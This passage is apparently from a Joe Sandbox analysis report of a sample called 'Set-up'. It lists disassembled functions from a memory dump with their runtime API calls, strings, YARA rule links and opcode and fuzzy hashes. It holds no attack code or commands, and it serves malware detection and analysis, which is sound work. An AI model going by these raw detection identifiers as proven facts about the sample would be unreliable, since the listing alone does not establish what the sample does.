Instruction Fuzzy Hash: D151E731D442E9DBDF108F18C94539E3BB4FF02B58F6445A6E86496198F3BC8E60EB52

Function 6BB82A38 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,00000000,?,?,?,?,?,?,?,6BB7D20F,?,00000000,00000000,?), ref: 6BB82A6A
??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,00000000,?,?,?,?,?,?,?,6BB7D20F,?,00000000,00000000,?), ref: 6BB82AF8
??_V@YAXPAX@Z.MSVCR100(?,?,?,00000000,00000000,?,?,?,?,?,?,?,6BB7D20F,?,00000000,00000000), ref: 6BB82C4F

Strings

,, xrefs: 6BB82C2C
,, xrefs: 6BB82C17

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID:
String ID: ,$,
API String ID: 0-220654547
Opcode ID: 03894b3d17109734d562bfcd162bd2f8fc99f3d3eba4bf352f169d5fa9c56562
Instruction ID: 73fc0bfe59303335d1ed66be1c8ac35569e68ac3cdd1b23f9698de14520a0a60
Opcode Fuzzy Hash: 03894b3d17109734d562bfcd162bd2f8fc99f3d3eba4bf352f169d5fa9c56562
Instruction Fuzzy Hash: 9C6124716097819FC728CF28C490A5BBBE2FF89314F544E6EE4EA8B251D774E841CB52

Function 6BB7C84D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6BB7C85F
LeaveCriticalSection.KERNEL32(?), ref: 6BB7C920
SetEvent.KERNEL32(?), ref: 6BB7C92F

Strings

$, xrefs: 6BB7C8EC
,, xrefs: 6BB7C8D3

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: $$,
API String ID: 3094578987-53852779
Opcode ID: 5f8b9cf4ed350f1bcf19a241b542979a03b3e2a3758566ba64bbe9c92ba6e3bc
Instruction ID: 13025c1512e4c57549784546455cd90f24dc436177756d00868b8619212edc91
Opcode Fuzzy Hash: 5f8b9cf4ed350f1bcf19a241b542979a03b3e2a3758566ba64bbe9c92ba6e3bc
Instruction Fuzzy Hash: 19310270E0474AEFCB24EFA9C5909AEBBB1FF48304B1085ADD566A7611C335E985CF90

Function 6BB48ED9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB48F59
_invalid_parameter_noinfo.MSVCR100 ref: 6BB6A694

Strings

P, xrefs: 6BB6A6B7

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: P
API String ID: 2959964966-3110715001
Opcode ID: b4594cfbb7066c9c193d30eb55ddf32ecdc70655408ba1b29cc7a16e5209f139
Instruction ID: 48ec8dfc5a3d00e203e6cad032dc8843420a89193a62b79fed3d3a55e7f283a9
Opcode Fuzzy Hash: b4594cfbb7066c9c193d30eb55ddf32ecdc70655408ba1b29cc7a16e5209f139
Instruction Fuzzy Hash: B42129316442E5EFDF116E6C8CC059DB7A6FF627947200DA9E66097288E23CCC549FD1

Function 6BB7B5D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

memcpy.MSVCR100(?,?,00000018), ref: 6BB7B5E4
??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000018), ref: 6BB7B5FD
_memset.LIBCMT(00000000,00000000,?), ref: 6BB7B62E
memcpy.MSVCR100(?,?,00000008), ref: 6BB7B654

Strings

,, xrefs: 6BB7B668

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: memcpy$_memset
String ID: ,
API String ID: 2982297706-3772416878
Opcode ID: ce875e42bf1f2ed31ba4c378de0ae8775ba556ddc7d3ab7dc834f6880682d53d
Instruction ID: 7929e9fe1960176a4534050fdcc3be67d10786873150f3ddff14ebcbdae33e8c
Opcode Fuzzy Hash: ce875e42bf1f2ed31ba4c378de0ae8775ba556ddc7d3ab7dc834f6880682d53d
Instruction Fuzzy Hash: 67210271600B40AFD738DF28C896E6BF7E9EF84314F258529E11A8B250D679E941CBA0

Function 6BB4498E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strcat_s.MSVCR100(6BB45C30,6BB45C0F,6BB45C20,?,00000083,00000083,?,6BB45C24,6BB45C0F,6BB45C30,00000002,6BB45C30,6BB45C0F,?,00000000,00000000), ref: 6BB449AD
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6BB45C0F,6BB45C30,00000002,6BB45C30,6BB45C0F,?,00000000,00000000,00000005), ref: 6BB70ACD
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB70AD8
_strcspn.LIBCMT(00000000,_.,,00000000,00000000,00000005), ref: 6BB70AE6

Strings

_.,, xrefs: 6BB70ADD

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __invoke_watson$_strcspnstrcat_s
String ID: _.,
API String ID: 4004410220-2709443920
Opcode ID: c333d1ae05f176c73b3c8a3732e6c6b952d212da3279a144f355d4e6315b939c
Instruction ID: c4c205aa0ff940351b4fb688aa15a869d5402071086a8855a03ee333a5ab4479
Opcode Fuzzy Hash: c333d1ae05f176c73b3c8a3732e6c6b952d212da3279a144f355d4e6315b939c
Instruction Fuzzy Hash: 23F0BB32504299BB8B101E399C8188F3719FE8023C7114537FE3895145DF3AD551AB50

Function 6BB4BAF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6BB4BB00
_malloc_crt.MSVCR100(00000018,00000014,6BB4BB81,00000000,00000000), ref: 6BB4BB0D

Part of subcall function 6BB40CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7,00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40CE5

std::exception::exception.LIBCMT(?,00000001,00000014,6BB4BB81,00000000,00000000), ref: 6BB672C0
_CxxThrowException.MSVCR100(6BB4BB81,6BB4BDD8,?,00000001,00000014), ref: 6BB672D5

Strings

bad allocation, xrefs: 6BB672B9

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ExceptionH_prolog3_catchThrow_malloc_crtmallocstd::exception::exception
String ID: bad allocation
API String ID: 2340149201-2104205924
Opcode ID: 48fe7425a16cc02f0d3d04404ee1c34811450aecfcb0d4aff0a288bc27af36a5
Instruction ID: abc1318abdc54fcd245d4f02c41b97cfa4cea3795615e6a99d4077b9ccf5e323
Opcode Fuzzy Hash: 48fe7425a16cc02f0d3d04404ee1c34811450aecfcb0d4aff0a288bc27af36a5
Instruction Fuzzy Hash: BD014F75500288EFDB28DF64D846FDEB7B8FF08754F10805AE605AB295CBBC9900EB65

Function 6BB4215F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB42200,00000008,6BB675E9,00000000,00000000), ref: 6BB42170
_lock.MSVCR100(0000000D), ref: 6BB421A4

Part of subcall function 6BB40C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40C5E

InterlockedIncrement.KERNEL32(?), ref: 6BB421B1

Part of subcall function 6BB42228: _unlock.MSVCR100(0000000D,6BB421C3), ref: 6BB4222A

_lock.MSVCR100(0000000C), ref: 6BB421C5

Strings

KERNEL32.DLL, xrefs: 6BB4216B

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _lock$CriticalEnterHandleIncrementInterlockedModuleSection_unlock
String ID: KERNEL32.DLL
API String ID: 2973837600-2576044830
Opcode ID: 395d056ec0ad96abdc5f81615d967da145e25acad1190b7a389ed83942dbc186
Instruction ID: c1bfba98ddd4b2be4038142431662facf0e197acd2a373575a0e25c4a2a4e317
Opcode Fuzzy Hash: 395d056ec0ad96abdc5f81615d967da145e25acad1190b7a389ed83942dbc186
Instruction Fuzzy Hash: 8001AD71804B80EFE7209F75C80674EBBE0FF11325F10494ED0DA932A4CBB8AA40EB61

Function 6BB77100 Relevance: 7.6, APIs: 5, Instructions: 100COMMON

Download Yara Rule

APIs

QueryDepthSList.KERNEL32(?,?,?,?,?,?,6BB769F3,?,?), ref: 6BB7717E
InterlockedPushEntrySList.KERNEL32(?,?,?,?,?,?,6BB769F3,?,?), ref: 6BB77193
QueryDepthSList.KERNEL32(?,?,?,?,?,6BB769F3,?,?), ref: 6BB7719A
InterlockedFlushSList.KERNEL32(?,?,?,?,?,6BB769F3,?,?), ref: 6BB771C9

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: List$DepthInterlockedQuery$EntryFlushPush
String ID:
API String ID: 4063097673-0
Opcode ID: a297ac91fafd1b3865cc81edf42332c36530b9ea45e0fda23ab4108401d86102
Instruction ID: 64df9013f479c7f6ca8048ee23967b21acf05a5453b8cd3b979c2c1af4fe34f7
Opcode Fuzzy Hash: a297ac91fafd1b3865cc81edf42332c36530b9ea45e0fda23ab4108401d86102
Instruction Fuzzy Hash: 2931C175210565AFCB10EF29C9808AA73E8FF4A3247144169E826DBB00DB78FD51CFE0

Function 6BB83E78 Relevance: 7.6, APIs: 5, Instructions: 100COMMON

Download Yara Rule

APIs

QueryDepthSList.KERNEL32(80000000,-00000001,00000000,?,?,?,6BB794CF,00000000,?,00000000,6BB7F8EF,00000000,00000000,00000000,00000000,00000000), ref: 6BB83EF6
InterlockedPushEntrySList.KERNEL32(80000008,-000000C8,?,6BB794CF,00000000,?,00000000,6BB7F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB7682D), ref: 6BB83F0D
QueryDepthSList.KERNEL32(80000008,?,6BB794CF,00000000,?,00000000,6BB7F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB7682D,?), ref: 6BB83F14
InterlockedFlushSList.KERNEL32(80000008,?,6BB794CF,00000000,?,00000000,6BB7F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB7682D,?), ref: 6BB83F43

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: List$DepthInterlockedQuery$EntryFlushPush
String ID:
API String ID: 4063097673-0
Opcode ID: 545b2214a7f042f1566e8956d270c6f2db96c7f21ecd4d755cd8a9d56420c7d8
Instruction ID: 9b38325aa17ee44a4d6a9687dd2398cbe5e936d9fc6b7587bc255d66bf22fac3
Opcode Fuzzy Hash: 545b2214a7f042f1566e8956d270c6f2db96c7f21ecd4d755cd8a9d56420c7d8
Instruction Fuzzy Hash: 2431AE75200565AFCB20DF28C9809AAB3F8FF4A721B144659F916DB740D738F951CBE0

Function 6BB4C656 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

_lock.MSVCR100(00000001,6BB4C6A0,00000010,6BB4C872,6BB4C8B0,0000000C), ref: 6BB4C66B

Part of subcall function 6BB40C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40C5E

_malloc_crt.MSVCR100(00000038,6BB4C6A0,00000010,6BB4C872,6BB4C8B0,0000000C), ref: 6BB68F66
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,6BB4C6A0,00000010,6BB4C872,6BB4C8B0,0000000C), ref: 6BB68F8E
free.MSVCR100(00000000), ref: 6BB68FA0

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CriticalSection$CountEnterInitializeSpin_lock_malloc_crtfree
String ID:
API String ID: 954917037-0
Opcode ID: a178a7571e0bc9841714116e15a43cdd19d18ff8149f3b2da51f2f3414b09b0e
Instruction ID: e01bf7057a51249b2e0a0bb2eb0dc52c08e03d9979a6970235ea493fa199a485
Opcode Fuzzy Hash: a178a7571e0bc9841714116e15a43cdd19d18ff8149f3b2da51f2f3414b09b0e
Instruction Fuzzy Hash: AE31B031504291DFDB10CFAAC482A1DBBF1FF2A724B51816AE056972A5CB39E846AF41

Function 6BB775A4 Relevance: 7.6, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR100(00000000,00000001,00000001,00000000,45C8E9F0,?,6BB75C86), ref: 6BB775FB
?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB77622
??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(6BB75CC6), ref: 6BB77663
?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100(?,?,?,?,?,?,?,?,6BB75CC6), ref: 6BB77692
?Block@Context@Concurrency@@SAXXZ.MSVCR100(?,?,?,?,?,?,?,?,6BB75CC6), ref: 6BB776B6

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Concurrency@@$Spin$??0scoped_lock@critical_section@?unlock@critical_section@?wait_for_multiple@event@A@@details@Block@Context@Once@?$_V12@V12@@Wait@$0
String ID:
API String ID: 358966004-0
Opcode ID: b8f35cc3934a414a7b9fc3f992d4a9f237ef9cb6cb37e0cc61d83d8ec0b16c54
Instruction ID: 0e2f15d7f7bc8d1d98ad650fb49d13f32a8fce20aceb8a56104852740aa4e905
Opcode Fuzzy Hash: b8f35cc3934a414a7b9fc3f992d4a9f237ef9cb6cb37e0cc61d83d8ec0b16c54
Instruction Fuzzy Hash: D931B8714483819FC320EF29C441B4AB7E0FB46768F100A3EF4B5872A0E7B9C548CB92

Function 6BB77785 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6BB7778C
??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,00000024,6BB854DA,00000000,6BB855E7,00000000,?,00000001,?,00000000,6BB85EC0,?,?,?,00000000), ref: 6BB7779F

Part of subcall function 6BB7B030: __EH_prolog3.LIBCMT ref: 6BB7B037

malloc.MSVCR100(00000001,?,00000024,6BB854DA,00000000,6BB855E7,00000000,?,00000001,?,00000000,6BB85EC0,?,?,?,00000000), ref: 6BB777E8
?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100(?,00000024,6BB854DA,00000000,6BB855E7,00000000,?,00000001,?,00000000,6BB85EC0,?,?,?,00000000), ref: 6BB7783A
_freea_s.MSVCR100(00000000,?,00000024,6BB854DA,00000000,6BB855E7,00000000,?,00000001,?,00000000,6BB85EC0,?,?,?,00000000), ref: 6BB77853

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Concurrency@@$??0scoped_lock@critical_section@?unlock@critical_section@H_prolog3H_prolog3_V12@@_freea_smalloc
String ID:
API String ID: 911861471-0
Opcode ID: 1340a965c0b6b3b8797e3a05968c4ca12b58f643f2916384664008902dec61df
Instruction ID: cc04dc1d80a735a6704508371a6a9e7a3b46d6a09cf645b889f5fb701a8eb4a1
Opcode Fuzzy Hash: 1340a965c0b6b3b8797e3a05968c4ca12b58f643f2916384664008902dec61df
Instruction Fuzzy Hash: 17218B71E002958FDB22EFAAC891A6EB7B5FF45710B1140B9D975AB350DBB8D801CB90

Function 6BB8BFDC Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,6BBE6CD0,00000104,?,?,?,?,?,?,6BB67432), ref: 6BB8BFFA
_parse_cmdline.LIBCMT ref: 6BB8C025
_malloc_crt.MSVCR100(?,?,?,?,?,?,?,6BB67432), ref: 6BB8C048
_parse_cmdline.LIBCMT ref: 6BB8C061
__cwild.LIBCMT ref: 6BB8C077

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _parse_cmdline$FileModuleName__cwild_malloc_crt
String ID:
API String ID: 953782237-0
Opcode ID: 7bd61c8e06bf7091ba05867594208779fb2a1bd0e3cc02e36547e100fc912947
Instruction ID: 308572af0cd690001f8ad5affdb55d3632e1cba02beb4c338f8e6bc5d766cf68
Opcode Fuzzy Hash: 7bd61c8e06bf7091ba05867594208779fb2a1bd0e3cc02e36547e100fc912947
Instruction Fuzzy Hash: 1911E6B2604254AFDB15CA74CC40EAE7BA8EB4A7F4F10075AE612E72D0DB75DE0187A0

Function 6BB82FB8 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB82FBF
EnterCriticalSection.KERNEL32(?,00000028,6BB7F124,00000000,?,00000000,?,6BB7CACE,?,00000000,00000000,?,?), ref: 6BB82FCB
??_U@YAPAXI@Z.MSVCR100(00000000,?,?), ref: 6BB82FF0
LeaveCriticalSection.KERNEL32(?), ref: 6BB8304D
??_V@YAXPAX@Z.MSVCR100(?), ref: 6BB8305B

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CriticalSection$EnterH_prolog3Leave
String ID:
API String ID: 4250467438-0
Opcode ID: 77a7a8713c004f62e7de65d4ee9459db9138a593f3c9d538d99619b848de175f
Instruction ID: d5230d3ab368a86d32bc69ea13943d95041aa80a3cc81749c6b5d1ea5f3a2830
Opcode Fuzzy Hash: 77a7a8713c004f62e7de65d4ee9459db9138a593f3c9d538d99619b848de175f
Instruction Fuzzy Hash: F9217F706002C69FDB28DF79C495B6EBBB5FF49340B1084A9F115DB261EB39D940CB20

Function 6BB575B1 Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

_localtime64_s.MSVCR100(?,?), ref: 6BB57600
asctime_s.MSVCR100(?,00000000,?), ref: 6BB57613
_errno.MSVCR100 ref: 6BB57628
_invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6BB69D0A
_errno.MSVCR100 ref: 6BB69D16

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_localtime64_sasctime_s
String ID:
API String ID: 2556715357-0
Opcode ID: bcf322e7b56089397aecf298c0ee26a82f42eb269fdaea10f0c49b15a9edf4b5
Instruction ID: 98c238393374cbffabf0bc3650cb9679136e0fc2604518cf9b37700989917b43
Opcode Fuzzy Hash: bcf322e7b56089397aecf298c0ee26a82f42eb269fdaea10f0c49b15a9edf4b5
Instruction Fuzzy Hash: E511E333B012999BDB019F2AD801ADE33A8EF4E714F50806AE8049B140EBBCDD008B92

Function 6BB4FAE4 Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

_wcsnicoll_l.MSVCR100(?,?,?,00000000), ref: 6BB4FB02
_errno.MSVCR100 ref: 6BB6C7BD
_invalid_parameter_noinfo.MSVCR100 ref: 6BB6C7C8

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
String ID:
API String ID: 1358483507-0
Opcode ID: 31976377e9f66eb5270225354bc971f1aa357b75c83dd8306faa09ddd05f95e8
Instruction ID: 57c4910ae4e06248f7cce99c54fc41a42c23f4454cbb571e3178c610949ae8b3
Opcode Fuzzy Hash: 31976377e9f66eb5270225354bc971f1aa357b75c83dd8306faa09ddd05f95e8
Instruction Fuzzy Hash: 8F1129315401E5ABDF340E64C8503BD32E5FB127E1F508555F8688B298EB3DCC40DBA2

Function 6BB50DAC Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(?,?,?,6BB51072,?,6BB510A8,0000000C,6BB510DE,Function_000113F7,?,?,00000000,?), ref: 6BB50DB6
_isatty.MSVCR100(00000000,?,?,?,6BB51072,?,6BB510A8,0000000C,6BB510DE,Function_000113F7,?,?,00000000,?), ref: 6BB50DBC
__p__iob.MSVCR100(?,?,6BB51072,?,6BB510A8,0000000C,6BB510DE,Function_000113F7,?,?,00000000,?), ref: 6BB68A2D
